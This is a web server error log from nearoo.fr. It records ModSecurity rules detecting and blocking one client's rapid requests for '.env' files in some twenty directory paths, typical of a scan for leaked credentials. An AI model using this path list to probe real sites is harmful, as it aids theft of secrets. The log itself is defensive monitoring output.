[Mon May 11 16:54:20.519700 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/deploy/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiHwAAAVI"]
[Mon May 11 16:54:20.632789 2026] [authz_core:error] [pid 1411099:tid 1411116] [client 75.119.155.172:2210] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/error_log
[Mon May 11 16:54:20.660755 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /build/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIAAAAVI"]
[Mon May 11 16:54:20.660967 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIAAAAVI"]
[Mon May 11 16:54:20.661203 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/build/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIAAAAVI"]
[Mon May 11 16:54:20.852677 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dist/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIQAAAVI"]
[Mon May 11 16:54:20.852890 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIQAAAVI"]
[Mon May 11 16:54:20.853117 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dist/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIQAAAVI"]
[Mon May 11 16:54:20.982065 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public_html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIgAAAVI"]
[Mon May 11 16:54:20.982318 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIgAAAVI"]
[Mon May 11 16:54:20.982549 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/public_html/.env"] [unique_id "agHtnIW8yzYoWG_eyCWiIgAAAVI"]
[Mon May 11 16:54:21.146116 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /htdocs/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiIwAAAVI"]
[Mon May 11 16:54:21.146399 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiIwAAAVI"]
[Mon May 11 16:54:21.146634 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/htdocs/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiIwAAAVI"]
[Mon May 11 16:54:21.352392 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJAAAAVI"]
[Mon May 11 16:54:21.352635 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJAAAAVI"]
[Mon May 11 16:54:21.352903 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/www/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJAAAAVI"]
[Mon May 11 16:54:21.491835 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /html/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJQAAAVI"]
[Mon May 11 16:54:21.492056 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJQAAAVI"]
[Mon May 11 16:54:21.492314 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/html/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJQAAAVI"]
[Mon May 11 16:54:21.721077 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /live/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJgAAAVI"]
[Mon May 11 16:54:21.721315 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJgAAAVI"]
[Mon May 11 16:54:21.721567 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/live/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJgAAAVI"]
[Mon May 11 16:54:21.968604 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prod/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJwAAAVI"]
[Mon May 11 16:54:21.968824 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJwAAAVI"]
[Mon May 11 16:54:21.969072 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/prod/.env"] [unique_id "agHtnYW8yzYoWG_eyCWiJwAAAVI"]
[Mon May 11 16:54:22.128719 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKAAAAVI"]
[Mon May 11 16:54:22.128938 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKAAAAVI"]
[Mon May 11 16:54:22.129202 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/dev/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKAAAAVI"]
[Mon May 11 16:54:22.173030 2026] [authz_core:error] [pid 1424905:tid 1424913] [client 75.119.155.172:2216] AH01630: client denied by server configuration: /home/castigli/public_html/wp-content/plugins/wordpress-seo/vendor_prefixed/ruckusing/lib/Ruckusing/Adapter/Sqlite3/error_log
[Mon May 11 16:54:22.287883 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKgAAAVI"]
[Mon May 11 16:54:22.288191 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKgAAAVI"]
[Mon May 11 16:54:22.288528 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/staging/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKgAAAVI"]
[Mon May 11 16:54:22.451565 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /opt/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKwAAAVI"]
[Mon May 11 16:54:22.451778 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKwAAAVI"]
[Mon May 11 16:54:22.452015 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/opt/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiKwAAAVI"]
[Mon May 11 16:54:22.744510 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiMQAAAVI"]
[Mon May 11 16:54:22.744733 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiMQAAAVI"]
[Mon May 11 16:54:22.744980 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "nearoo.fr"] [uri "/laravel/.env"] [unique_id "agHtnoW8yzYoWG_eyCWiMQAAAVI"]
[Mon May 11 16:54:23.021320 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /symfony/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiMwAAAVI"]
[Mon May 11 16:54:23.021546 2026] [security2:error] [pid 1424905:tid 1424926] [client 13.203.95.122:59774] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "nearoo.fr"] [uri "/symfony/.env"] [unique_id "agHtn4W8yzYoWG_eyCWiMwAAAVI"]
